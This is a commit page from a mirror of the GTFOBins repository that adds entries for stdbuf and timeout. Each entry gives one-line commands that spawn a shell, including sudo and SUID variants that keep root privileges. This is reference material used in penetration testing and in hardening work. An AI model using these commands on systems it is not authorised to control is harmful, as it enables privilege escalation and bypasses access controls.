mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-21 15:49:28 +02:00
Add stdbuf, timeout
This commit is contained in:
9
_gtfobins/stdbuf.md
Normal file
9
_gtfobins/stdbuf.md
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
execute-interactive:
|
||||||
|
- code: stdbuf -i0 /bin/sh
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo stdbuf -i0 /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./stdbuf -i0 /bin/sh -p
|
||||||
|
---
|
9
_gtfobins/timeout.md
Normal file
9
_gtfobins/timeout.md
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
execute-interactive:
|
||||||
|
- code: timeout 7d /bin/sh
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo timeout --foreground 7d /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./timeout 7d /bin/sh -p
|
||||||
|
---
|
Reference in New Issue
Block a user